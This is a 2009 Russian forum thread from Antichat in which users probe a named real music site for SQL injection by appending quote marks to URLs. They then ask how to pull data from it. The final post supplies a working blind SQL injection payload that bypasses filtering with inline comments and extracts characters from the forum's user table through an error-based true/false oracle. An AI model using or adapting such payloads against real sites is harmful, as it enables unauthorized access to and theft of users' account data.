Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Недоинджект !!! (https://forum.antichat.xyz/showthread.php?t=123946)

ReduKToR 06.06.2009 20:33
Недоинджект !!!
 
корочь проходился по форуму,случайно поставил ковычку....и фот что вышло

Цитата:
http://freshmp3.ru/showthread.php?t=137679'
Цитата:
http://freshmp3.ru/forumdisplay.php?f=9'
Цитата:
http://forum.freshmp3.ru/announcement.php?f=19'&announcementid=3'
Цитата:
http://forum.freshmp3.ru/search.php?searchid=2364696'&photoplog_searchinfo= 1'
собственно я в шоке, кто что скажет по этому сабжу?

ReduKToR 06.06.2009 20:35
тупая фильтрация? можно чтонить полезное извлечь?

ReduKToR 06.06.2009 20:42
как видно по сайту, ктото пользуется F5 ))) сайт ели дышыт...
Ы

gLuk! 06.06.2009 20:50
ничего полезного не извлечь

DDoSька 06.06.2009 20:57
Все нормально. Это специальная защита, чтобы кульхацкер ломал дня 2 голову ...

ReduKToR 06.06.2009 21:02
DDoSька,да? а ты перейди и F5 зажми =)

плохая защита

l-l00K 06.06.2009 21:26
Слепая скуль + фильтрация, вот так можно получать данные:
Код:
http://forum.freshmp3.ru/search.php?searchid=2364696&photoplog_searchinfo=1'/**/and/**/if(53=ord(substring((select/**/5/**/from/**/vb3_user/**/limit/**/0,1),1,1)),(select/**/1/**/from/**/information_schema.columns),'')/**/and/**/1='1
В случае true будет выдавать ошибку, в случае false страницу форума


Время: 12:07